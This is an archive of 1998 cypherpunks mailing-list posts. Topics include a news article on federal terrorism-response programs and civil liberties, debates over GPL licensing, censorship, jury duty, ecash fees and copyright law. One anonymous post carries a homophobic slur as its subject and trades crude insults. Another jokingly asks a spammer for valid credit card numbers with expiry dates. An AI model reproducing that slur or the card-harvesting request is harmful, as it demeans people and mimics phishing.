Mass Destruction Act of 1996," which mandated the
federal government to develop response scenarios to
domestic terrorist incidents involving nuclear,
biological, chemical and radiological weapons. The
legislation designated the Department of Defense as
the lead agency in coordinating sweeping plans
involving the Federal Emergency Management
Agency, the FBI, Department of Energy, the
Environmental Protection Agency and the Department
of Health and Human Services. Representatives of all
these agencies meet monthly as the Senior Interagency
Coordination Group, or SICG. 

The Defense Appropriations Act of 1997 added
funding for the Pentagon "to improve the capability of
the federal, state and local emergency response
agencies." 

"The United States Army Chemical and Biological
Defense Command leads interagency training
development and city visits," H. Allen Holmes,
assistant secretary of defense for special operations
and low-intensity conflict, testified to the Strategic
Forces Subcommittee of the Senate Armed Services
Committee earlier this year. "Interagency teams
coordinate with fire, police, emergency medical and
hazardous material officials and tailor training to city
requirements. Additionally, FEMA has developed a
terrorism annex to the Federal Response Plan to
ensure coordination across all agencies at all levels." 

In 1997, the Defense Department spent $30.5 million
on the training and civil response aspects of the
program, Holmes reported. An additional $10 million
was dedicated to improving the U.S. Marine Corps
Chemical-Biological Incident Response Force. This
year, Congress allocated $50 million for the domestic
preparedness program. Another $50 million is
appropriated for the program in 1999. 

The money is for training purposes only. However, the
Defense Department is lending equipment to state and
local agencies, according to Holmes. 

The program calls for the National Guard to stand up
10 Rapid Assessment and Initial Detection teams in
selected cities across the nation using 200 full-time
active guardsmen and reservists. Members of Army
Guard and reserve chemical companies will be trained
next year to conduct searches for weapons of mass
destruction. 

The goal of the domestic preparedness program is to
train 120 cities by 2001 and to provide mechanism for
every community in the nation to "leverage federal
expertise," according to the Defense Department. The
interagency team has trained more than 10,000 "first
responder trainers" -- drawn from firefighting, law
enforcement, emergency medical communities and
emergency telephone operators and dispatchers -- in
30 cities, according to Defense Secretary William
Cohen. Another 25 cities will receive training in the
next year, he said. 

"Our program is specifically designed so that the
people we train become trainers themselves," Cohen
said earlier this month in a report to the Council on
Foreign Relations titled "Security in a Grave New
World." "This approach will greatly magnify our efforts
to produce a core of qualified first responders across
the nation." 

FEMA has compiled a master inventory containing
information on the resources and capabilities of each
agency involved in the program and what is available
to state and local officials in emergency situations.
However, the information on that inventory is not
available to the public or the press -- only to federal
and state emergency planners. Undisclosed surplus
military equipment is being made available to state and
local government agencies through this program. 

Some civil liberties groups have pointed out that the
intense, coordinated rush to "fight terrorism" in
America comes at an odd time -- given the
government's own figures reporting a 25-year low in
such attacks and incidents. 

The National Association of Criminal Defense
Lawyers points out, for instance, that the
overwhelming majority of law enforcement's record
number of applications to eavesdrop on people
through electronic surveillance technology involves
investigation into drug, racketeering and gambling
offenses -- not terrorism. There was bipartisan support
in Congress for giving the executive branch of
government vast new, codified authority to plant
wiretaps and electronic bugs and to confiscate
property as a result of investigations in this effort to
"combat terrorism." 

The 1996 law grants the president exclusive,
unreviewable powers to designate groups "terrorist
organizations." Under such powers, the government
could deport suspects -- including permanent residents
and non-immigrants -- based on "classified" or "secret
evidence" under the cloak of national security. Another
provision of the legislation requires banks to freeze
assets of domestic groups and citizens deemed agents
of such "terrorist organizations." There is no
mechanism established to challenge such decisions by
banks. 

In a development the Defense Department claims is
unrelated to the terrorism plans, more actual combat
training is taking place in urban centers. Earlier this
month, Marines took part in such a training exercise in
Maryland. Last month, a special unit of U.S. Marines
with assault rifles conducted maneuvers in Birmingham,
AL. 

These exercises are part of a program called "Training
in the Urban Environment. " 

All of the operations, including the exact timing of the
exercises, were kept secret from the public, raising
concerns about civil liberties issues. 

Similar exercises have been conducted recently in
Chicago, Jacksonville, FL, and other U.S. cities. The
question on some minds is: Who exactly are the
Marines preparing to wage war with in America's
urban environments? 

The training is part of a certification program in "urban
combat." The program includes missions, such as
rescuing a pilot, which the Marines might be called to
perform in foreign countries such as Somalia, military
spokesmen say. Marine officials say the urban
landscape adds a new dimension to the training the
Marines have already received. 

 (c) 1998 Western Journalism Center 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 28 Sep 1998 17:27:55 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: GPL & commercial software, the critical distinction
Message-ID: <199809282229.RAA03186@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

It has been asserted that the use of GNU code within a project causes that
product to be GPL'ed and as a result the GPL is not commercialy viable.

This is an incorrect interpretation.

The GPL does say that if you use GPL'ed code in your project then the
project is GPL'ed, it does NOT say that if you make function calls into a
GPL'ed library that the product is GPL'ed. This distinction makes fully
commercial and source-secure products within the GPL infrastructure possible
and feasible.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 28 Sep 1998 21:45:19 +0800
To: cypherpunks@cyberpass.net
Subject: Letter to Editor on Censorship
Message-ID: <3.0.5.32.19980928184330.00b69af0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Monday 9/28/1998's San Mateo County Times had a really strong,
if slightly naive, editorial in favor of the First Amendment
protections on speech and the press.  Among other things,
it was quite positive about the fact that the Starr Report
was able to be widely published in spite of content that
would have been censored in the past, and that it would be hard to
imagine how we'd explain to future generations 25 or 50 years from now
that we'd covered up this important part of the historical record
just because its content was vulgar.  Heh.  Their heart's in the right place...



To: Editor, San Mateo County Times, 

Thank you for Monday's great editorial supporting freedom of speech.
Unfortunately, it's a right preserved only by hard work, and 
getting recognition for all forms of speech beyond just ink on paper 
is an ongoing struggle.  
Publishing the Starr Report on the Internet would have been illegal if the 
EFF, ACLU, and publishers hadn't challenged the "Communications Decency Act", 
which the Supreme Court threw out 9-0, and unlike Nixon's tapes, 
a few "Expletive Deleted"s can't clean up the Starr Report.

As your editorial says "it would be hard to imagine", but censors are 
still at it - a Congressional committee just passed a reworded version, 
hoping they can get away with "protecting minors" as a loophole. 

Some people contend that the First Amendment doesn't protect rude language, 
only political speech.   But if you oppose campaign finance limits, 
they'll contend that elections are too important to allow 
unregulated political speech on TV or newspapers.  
And Joe Camel?  He's illegal too.

Meanwhile, the range of opinions on TV and radio is quite narrow - 
big corporations and government public broadcasting buy up the few 
TV licenses, while the FCC bans low-power broadcasters who can 
provide a diversity of opinion, and most cities grant monopolies 
on cable TV networks.

And FBI director Louis Freeh, in his push for expanded wiretaps, 
has been using Anti-Communist Cold War restrictions on exporting 
encryption software to keep foreigners and Americans from using 
tools that allow them to talk privately without censorship.

Eternal vigilance is still the price of liberty.

================

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 28 Sep 1998 19:07:06 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: GPL & commercial software, the critical distinction (fwd)
Message-ID: <199809290009.TAA03654@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 29 Sep 1998 00:45:55 +0100
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: Re: GPL & commercial software, the critical distinction

> There are two distinct licenses promoted by the FSF.  They are the GNU
> GPL (General Public License) and the GNU LGPL (Library General Public
> License).
> 
> As you suggest the LGPL is usuable.

I'm suggesting both are usable for commercial code development, just don't
put GPL'ed source code in your source code. There is NO limitation of the
GPL or the LGPL that prevents a commercial product from making calls into
the GPL'ed library.

The problem with your interpretation is that in a sense you want your cake and
eat it too. In short you want to be able to use somebody elses code in your
product without their having a say in how their code is used or receiving a
cut of the profits. The GPL/LGPL is specificaly designed to prevent this.

If you use their code (not the binaries, though you will be required to
provide source to those binaries if you distribute it with your product
though this won't include the binaries to your commercial product) then
you must release your code - an extension of derivation.

If you desire to produce commercial secure-source code compatible with a GPL 
license then simply don't ship *any* GPL with your product and use no GPL
source or LGPL'ed library in source form in that product.

The point to the L/GPL is not to prevent commercial code development but
rather to prevent somebody from taking a library some programmer written and
released for non-commercial (a distinction not permited under public domain)
use while retaining control over that source so that if somebody, like
yourself, bops along and decides they can make a million with it the
original programmer gets a cut or you loose your million.

How does the original programmer get a cut? Simple, the commercial entity
contacts the programmer and licenses a non-GPL'ed version of the library.

Bottem line, don't steal other peoples code to make money without paying
them for their effort. It's that simple.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 28 Sep 1998 21:45:27 +0800
To: Marshall Clow <cypherpunks@Algebra.COM
Subject: Re: Jury duty considered harmful, or at least rare
In-Reply-To: <19980924015428.2767.qmail@hades.rpini.com>
Message-ID: <3.0.5.32.19980928190953.00b5aea0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



An Anonymous College Student wants to be able to stay off jury duty,
and also complains that the system ties you up all day in court
even if you're not picked.  I've been called for jury duty in
three or four different counties, which had different approaches
to the jury selection and different levels of disrespect for the
time of potential jury pool members.  In Santa Clara County CA,
you're required to telephone into a badly organized recording
every day for a week to see if your number is up, and if
it does come up you need to go in, but otherwise not.
In Monmouth County NJ, you're called for a week, though they'll
let you go on Thursday afternoon if you haven't been picked
for a trial.  I played a lot of bridge that week....
In Middlesex County NJ, you and the lawyers all have to 
show up on Monday, and if they don't need you, you're done.

If you really want to both serve the public and get out of jury duty,
take a bunch of literature from the Fully Informed Jury Association
and start handing it out in the jury pool, explaining to people that
under the common law, juries have both the power and the moral obligation
to find people innocent if the law they're accused of is a bad law
or if the punishments are far out of proportion to the crime -
such as the fugitive slave laws of the 1800s or the 
alcohol and drug prohibitions of the 1900s, or hanging forgers in the 1800s 
or three strikes* for non-violent felons in the 1900s.  

	[*I'm not saying that three strikes for violent felons isn't appropriate, 
	but California's law goes far beyond that in practice.
	And we've had FIJA fights here before, and don't need them again.
	For the purpose of this discussion, the important FIJA issue
	is which door you'll be thrown out of, which body parts you'll land on,
	and how many times you'll bounce on your way out. :-)  ]

>Actually, the last time that I was called, the largest proportion of potential
>jurors were people who work for the government in one form or another.
>City park workers, school teachers, post office workers, clerical workers
>who work at city hall, etc.  Retirees were the next largest group.
>Between the two, they accounted for 80+ of the jury pool.

Yup.  Jury participation is critical for preserving a free society,
but you can't preserve freedom by forcing people to participate in things.
Unfortunately, to the extent that jury systems do allow people
who have better things to do with their time (like running businesses)
out of jury time, they tend to filter in favor of people who'll 
cooperate with what the government wants - like retired schoolteachers.

Also, jury selection processes tend to filter out people who
don't appear likely to do what the prosecution and/or defense tell them;
it's an interesting thing to watch.  And the prosecution and sometimes
the other jurors often get grouchy when some jurors aren't cooperative -
an engineering supervisor I once worked with was one of two jurors who
hung their jury be refusing to accept the contention that a Hispanic man
should be guilty of carrying drugs and drug paraphrenalia because the
airplane glue he'd bought at the hardware store was in a plastic bag
which he *obviously* intended to use for sniffing it with.  (And this was
in New Jersey, where's it's not even illegal to be Hispanic....)
Of course, they did get much less abuse than the friend of mine who
refused to convict someone for drug possession because the drug war is bogus...
he got yelled at a lot afterwards, but being a New Yorker he viewed that
as entertainment and returned fire in kind.




				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 28 Sep 1998 18:42:53 +0800
To: cypherpunks@toad.com
Subject: Superterrorism
Message-ID: <199809282332.TAA26652@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



The Fall issue of Foreign Policy has an article, "The Great
Superterrorism Scare," which critiques the national "obsession"
with the threat of terrorist use of weapons of mass destruction:

   http://jya.com/superterror.htm  (36K)

It examines the reasons for the obsession, who is promoting
it, who benefits, and what problems it may cause by diverting
attention and resources away from genuine threats of lesser
magnitude from religious cults, loners, antitaxers, militias and
those with raging paranoia against the government.

It's worth noting that the author recommends arrests be 
allowed of suspicious domestic hostiles though there is no proof 
of criminal intent, and that the FBI and CIA be freed from 
limitations on surveilling and investigating US citizens.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 28 Sep 1998 12:45:47 +0800
To: cypherpunks@toad.com
Subject: Re: faggots
Message-ID: <199809281736.TAA25997@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



My only regret is that someone is gonna have to spring for the wienies
for or wienie roast in hell.  This guy's is obviously too small to use.


At 05:14 PM 9/26/98 -0700, Tim May wrote:
>At 12:48 PM -0700 9/26/98, CSapronett@aol.com wrote:
>>My only regret is that I wont get to watch you all burn in hell !!!
>
>
>Oh, but you will.
>
>
>--Tim May
>
>
>(This space left blank pending determ. of acceptability to the gov't.)
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Licensed Ontologist         | black markets, collapse of governments.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 28 Sep 1998 14:06:07 +0800
To: eay@cryptsoft.com
Subject: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <Pine.GSO.3.96.980929021733.29055D-100000@pandora.cryptsoft.com>
Message-ID: <199809281845.TAA18662@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Eric Young writes:
> On Mon, 28 Sep 1998, Adam Shostack wrote:
> > | If one is interested to encourage people to include crypto in their
> > | applications, GNU style licenses are a step in the wrong direction.
> > 
> > I wholeheartedly agree.  Theres a number of packages out there I'd
> > love to be able to use in products I'm building.  Code re-use,
> > customers not having to worry about what libraries we're using, and
> > convincing management to free some of the stuff we're doing, are all
> > good arguments in favor.  The contamination bits of the GPL utterly
> > prevent us from doing this.  BSD, PD, or Artistic licenses are far
> > preferable.
> 
> :-) A certain person I work closely with likes to call it a virus.
> Once a package is infected by some GPL code, it takes over the whole package
> (according to the licence).

That concisely says what is wrong with GPL for the purposes of crypto
deployment to head off government key grabbing attempts.  It is a
license virus.  A license virus with this aim: to propogate the
license allowing free access to source code, and (the killer for
crypto deployment!!) propogating the provision that anyone has the
ability to re-sell any source code based on GNU source code.

The negative implications of GPL don't hit you until you are involved
in actually trying to create some commercial software.  Try it, and
you quickly realise that all that GNU software is useless for the
commercial people's purposes.

Consider: GNU says that all of their source must be GNUed if any of
the code you use is.  So now they have a GNU license on their
software, and the other provision of the license means that anyone is
allowed to take the software they are selling and re-sell it!  It is
indeed no wonder that their lawyers have fits.

(There is a difference between GNU and GNU Library.  GNU library allows
you to use a library without infecting your entire software.  GNU
library is sort of usable.)

I used to be quite pro-GNU until I tried this exercise (writing
commercial crypto software for software companies) and ended up
re-writing huge tracts of stuff just to remove the GNU license virus.
This extra expense, hassle, etc likely kills many commercial crypto
projects, and the whole aim of the game is to encourage commercial
people to add crypto to their software.  This aim often conflicts with
RMS/FSF's aims.


I have from time to time proposed the idea of a `cypherpunks license'
which embodies cypherpunk goals, as distinct from RMS's particular
concept of `free source', noble tho' this aim is, it conflicts with
the crypto deployment aim, which for many of us takes precedence. (GNU
source is actually highly restricted source -- but it guarantess that
you can get it, and stops other people preventing you from getting
source for derived works).

All stuff I have written (non-commercially) so far has been PD.
(Actually I don't even dignify it with a `this is PD' note -- I
personally have zip respect for copyright, patents, licenses).

However, perhaps one could do one better than PD: restrict use to
propogate cypherpunk goals.  eg. 

- You may not use this code in software which provides government back
doors.

And perhaps, as a condition of the license the software should display
some anti-GACK slogan :-), or a URL for a site with lots of
documentation on key grabbing attempts, clipper I - IV, ECHELON, etc.

And perhaps:

- secret service agencies can not use this software / or must pay
exorbitant license fees

> I've seen some people in the GNU camp argue that the BSD type licence gets
> ugly because of all the 'includes code from xyz' type messages, but my
> experiance is that comercial people can overcome this, but not the GPL.

Agree, same experience here.

> I changed from the GPL quite some time ago, primarily because I was
> getting sick of email from people wanting to use a library of mine
> but their legal people were going into spasms because of the full
> implications of the GPL.

I was saying to Werner in email that SSLeay is probably the most
widely used crypto package in both commercial and non-commercial
software.  I suggested that if you had used GPL, the commercial use
would have been greatly hindered.  You backed this up above.

btw. I consider this discussion is highly topical for coderpunks --
the license put on software hugely impacts it's value, and coderpunks
was originally intended (by it's proposers) to provide a lower noise
environment for cypherpunks interested in code.  

Of late it appears to me that coderpunks has almost lost interest in
it's cypherpunk origins -- few to none of the comments relate to
creating crypto code to further a political aim.  `cypherpunks write
code ...' for a reason, and I suspect some coderpunks have lost sight
of that reason, or perhaps many have joined more recently and never
had sight of it, crypto coding being just a job to them.

In all it might seem even that coderpunks has had a negative impact on
the amount of crypto coding happening -- it ciphoned off coders who
had been active on cypherpunks into a low volume, apolitical mailing
list where nothing much happens, and propsed projects quickly die.

The role of the coderpunks retro-moderators, though well meaning of
course, I think has not helped either, in that even questions about
export (surely relevant for usefulness of code) are flagged as
off-topic.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 28 Sep 1998 12:57:36 +0800
To: customerservice@bigstar.com
Subject: Re: Website owner/administrator
Message-ID: <199809281751.TAA27415@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



We appreciate your considerate mail, but we have already setup our
e-commerce section of our website.  However, we would really
appreciate some feedback.  What this would require is that you send
us a list of valid credit card numbers, preferably 500 or more, and then
we can show you that none of these will be compromised in the next
week!

We have every faith in our e-commerce line, and we'd really love to have
industry leaders such as you help prove it!  Please send the list, along
with expiration dates, to cypherpunks@toad.com.

		Thank you,
		Cypherventures, Ltd.


At 02:21 PM 9/27/98 -0500, BigStar.com wrote:
>Join the BigStar Network!
>
>If you don't already have an e-commerce plan, BigStar.com can put you in
>the game now!  You're probably already familiar with affiliate programs like
>Amazon.com and Barnes and Noble.
>
>BigStar is an online VIDEO superstore offering web sites like yours the
>opportunity to become affiliates and earn commissions of 8% (or more) on
sales
>generated by your site  this is your chance to make online e-commerce work
>for you!
>
>This is a completely COST-FREE opportunity.  For more information or to
>sign up, go to http://www.bigstar.com/aff/index.ff?banid=1060
>
>Big Movies, Big Selection, Big Deals, Big Fun!
>
>=========================================
>BigStar is a responsible Direct Marketer and adheres
>strictly to industry-established e-mail guidelines.
>To unsubscribe from our list, just reply to this
>message with the word "remove" in the subject line
>to the above address
>=========================================
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Mon, 28 Sep 1998 21:55:17 +0800
To: lazlototh@hempseed.com
Subject: Re: Cypherpunks defeat?
In-Reply-To: <v04011701b235ed0a62c8@[199.125.99.14]>
Message-ID: <199809290256.TAA24503@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



Lazlo Toth writes:
> 
> On or about 11:49 PM +0100 9/28/98, Adam Back wrote:
> >You want to buy ecash tokens with plastic.  Ideally you want to be
> >able to buy ecash tokens with an ATM card because you don't want to
> >incur any withdrawal fee (ATM withdrawals incur no transaction fee the
> >UK, US may be different.)
> 
> In the case of my US bank it's the opposite:  ATM withdrawals, unless I use
> a machine owned by my bank, cost me US$1.50.  Credit card fees on the other
> hand are paid by the merchant, who is contractually bound NOT to pass them
> on to me.

Not directly as an added charge.  But they do indeed pass it on.
The card associations won't let them directly charge an added amount for
using a credit card, because that would remind consumers that they're
paying for the privlidge.. and that might discourage them from
using plastic.  But it's ok for the merchant to offer 'discounts' for
buyers who use cash instead of credit cards.  That 'discount'
is the real price of the goods with the credit-card surcharge
subtracted.  Often that's 3-4%, sometimes as low as 1.2%.

> >Buying ecash tokens with a credit card is going to result in the cash
> >advance minimum fee, plus unwanted (and typically double digit APR)
> >interest on the "advance".
> >
> >Debit cards are a bit cheaper, but still incur some fee (unless a bank
> >could be persuaded to waive it for this class of transaction).
> 
> My debit card functions as both ATM and credit card.  When given a choice I
> will always prefer to use it as a credit card, which costs me nothing.

It still costs you the credit fee, hidden inside the purchase price.
Visa and MasterCard don't have massive staffs and huge office
buildings because they're dumb.

-- 
Eric Murray          N*Able Technologies                    www.nabletech.com
(email:  ericm  at the sites lne.com or nabletech.com)     PGP keyid:E03F65E5




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 28 Sep 1998 13:04:36 +0800
To: Alexdoulis@aol.com
Subject: Re: Police would never exagerate ? Guess what...
Message-ID: <199809281757.TAA27737@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I think the 165 year old boy has some more serious problems to worry
about.  Like how to get rid of that smell emanating from his decomposing
body, and how to make people stop running in fear at the sight of him.
Nobody like a zombie.


At 11:17 PM 9/27/98 -0400, Jean-Francois Avon wrote:
>==================BEGIN FORWARDED MESSAGE==================
>>Date: Mon, 28 Sep 1998 09:57:46 +0930
>>From: SSAA <Sporting.Shooters.Association@adelaide.on.net>
>>Subject: NEWS - Toy Pistol case dismissed
>>Reply-to: Sporting.Shooters.Association@adelaide.on.net
>
>THE SUNDAY TELEGRAPH, Sydney.    Sept 27.by Wayne Jones.
>A MAGISTRATE has dismissed charges against a 165 year old boy who faced
>jail for possessin a toy cap gun.
>The magistrate, Hal Halenstean, made the decision after hearing what he
>described as a "silly case" on Friday.
>"We all have better things to do", Mr Halenstein said,
>The boy, who cannot be identified bought the toy cap gun from a toy
>stall at Victoria's Dandednong Market on May 12.
>Minutes later, police looking for drug dealers found the cap gun in the
>boy's jacket. They charged boy with several firearm offences which carry
>a jail sentence.
>In court, Mr Halenstein twice gave prosecutors on opportunity to
>withdraw the charges against the boy, but police indicated they would
>continue to contest the case.
>Using special provisions of the Sentencing Act, Mr Halenstein then
>dissmissed the charges.
>The boy's barrister, Arend Slink, said the court case had set a
>precedent under the new gun laws. Toy cap guns could no longer be
>classed as prohibited weapons, he said.
>"If there is any sinister intent there are a range of serious charges
>that a person could be charged with. "Mr Slink" said"But in the case of
>a child possessing a toy cap gun a precedent has now been clearly set".
>The Sunday Telegraph reported on May 24 the boy could face jail if found
>guilty of the swrioud gun charges, which included:
># Being a non-prohibited person did possess/carry a handgun which was
>not registered. 
># Being a non-prohibited person did possess/ carry a handgun which ge
>did not have a licecnce for under part two of the Firearms Act 1996.
># Did own a handgun whilst not authorissed by a licence under the
>Firearms Act 1996 to possess a firearm.
>Police had alleged the toy gun was consedered an imitation firearm inder
>strict new gun laws and therefore deemed to be a prohibited weapon.
>The toy gun bought by the boy is one of thousands soldacross the state. 
>The boy said he had bought the toy cap gun with pocket money.
>THE END.
>------------------------------------------------------------------------ 
>View Democrat Firearm Policy
>www.ssaa.org.au/dempolicy.html
>Print, copy and distribute.
>
>
>===================END FORWARDED MESSAGE===================
>
>
>Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
>  DePompadour, Socit d'Importation Lte
>     Limoges fine porcelain and french crystal
>  JFA Technologies, R&D physicists & engineers
>     Instrumentation & control, LabView programming
>PGP keys: http://bs.mit.edu:8001/pks-toplev.html
>PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
>PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 28 Sep 1998 20:11:51 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: cypherpunk license: PLEASE STEAL ME (Re: GPL & commercial software, the critical distinction) (fwd)
Message-ID: <199809290114.UAA04026@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 29 Sep 1998 01:53:23 +0100
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: cypherpunk license: PLEASE STEAL ME (Re: GPL & commercial software, the critical distinction)

> OK, but it would seem to me that to interpret GPL in this way is in
> violation of the spirit (and probably legal intent if interpreted by a
> lawyer).

Actualy this situation is specificaly addressed in the LGPL in regards
header files and how they are the gray area in all this and probably
indefensible in a court (it says this in the LGPL go look...www.gnu.org).
As programmers this is what we want after all, the API to be described so we
can replace those proprietary libraries and programs if we desire.

Actualy you missed the obvious way to distribute commercial code and the
(L)GPL will protect your propietary work....

In both licenses it is very specific in noting that a L/GPL'ed work that is
subsumed in another causes that work to become L/GPL'ed by default. It
further notes that there is NO implication that the use of commercial
code/libraries in a L/GPL'ed work can be construed to L/GPL that proprietary
code.

How I do jobs for my customers is that I develop my programs and libraries I
want to protect via copyright and then distribute them with a set of scripts
and makefiles that during install build the end product. So the end user can
enjoy the privileges of the L/GPL'ed code (ie can fix bugs and relink the
libraries to their hearts content) and I protect my work. The catch is to
make sure the makefiles and scripts are L/GPL'ed. You could even include gcc
or egc on the distribution medium and use it to compile the resultant
without worrying about your commercial code being subsumed. It is quite
commen today for commercial houses to use gcc/egc to develop and distribute
fully commercial code, the catch is that none of the end resultant code can
come from L/GPL'ed sources.

This harks back to my comment earlier today about the GNU/cash system being
a perfect medium for the implimentation of crypto/e$ protocols. The catch is
that you have to be willing to give up your claims to the stubs that must be
placed in the L/GPL'ed product. If you can get away with using named pipes
as buffers and T's then it becomes reasonably trivial to create a situation
where one can inject non-L/GPL'ed code into the stream without the
functional code so injected falling under the L/GPL.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 28 Sep 1998 22:14:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: [salman rushdie]
Message-ID: <3.0.5.32.19980928201440.00b74d00@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



On 9/27/98, A Cypherpunk Who Wishes Not To Have His Name Used Here wrote to me:

> In article <3.0.5.32.19980926215457.00ad1510@idiom.com> Bill Stewart wrote:
> > If there's cypherpunks relevance to this, it's that cryptographic
> > privacy and digital cash payments make it easier to publish
> > controversial material without the threat of violence against you.
>
> On the other hand, privacy and digital cash payments make it 
> easier to hire and reward hit men.
>
> You may not like it, but there's no sense in pretending it isn't so.

True enough, though in Rushdie's case, the social environment
provided enough protection that the murder could be called for,
the reward could be offered, and several of Rushdie's associates
could be murdered without any resort to crypto.

At least if you want to publish something that you _know_ will
annoy people enough that they want to kill you, you can do it
more safely if you've got a range of options for anonymity.

~~~~~~~~~~~

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 28 Sep 1998 20:44:10 +0800
To: users@EINSTEIN.ssz.com (SSZ User Mail List)
Subject: Copyright may limit Internet (w/o encryption) [CNN]
Message-ID: <199809290147.UAA04187@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.cnn.com/TECH/computing/9809/28/copyright.fight.ap/

>    WASHINGTON (AP) -- When Lois Gibbs learned in 1978 that 20,000 tons of
>    toxic chemicals were buried under her Niagara Falls, N.Y.,
>    neighborhood, she tried to make sense of all the information and
>    scientific names suddenly thrown at her.
>    
>    She turned to her local library, wading through medical journals and
>    old newspaper articles to understand the chemicals and the diseases
>    they caused. Gibbs credits this immediate access to information with
>    helping her organize parents in Love Canal and spread the word about
>    toxic dumps.
>    
>    Now, thanks to the Internet, there's more information than ever
>    before. But educators and librarians fear that average citizens won't
>    be able to get at it because of proposed changes in copyright laws.
>    
>    Congress is trying to balance protecting the work of authors,
>    songwriters and others with making important information available to
>    students and other researchers.
>    
>    The House and Senate could agree this week on legislation that would
>    implement two copyright treaties adopted in 1996 by the U.N. World
>    Intellectual Property Organization.
>    
>    Current "fair use" laws allow personal use of copyrighted material
>    without obtaining advance permission. Students can quote from books in
>    their research papers and cable systems can relay television programs,
>    for example. The new version could lead to the encryption of some
>    material, keeping it out of the hands of anyone without a password or
>    other authorization.
>    
>    Hollywood and publishing industry officials say they are not trying to
>    keep information from the general public. But they want to protect the
>    work of their artists and writers from being downloaded and mass
>    distributed with a few keystrokes.
>    
>    "Everyone hopes that the Internet will become a great resource for
>    education, entertainment and commerce," said Allan Adler, vice
>    president for legal and governmental affairs at the Association of
>    American Publishers. "But one of the problems is that the medium
>    represents an extraordinary capability for flawless reproduction and
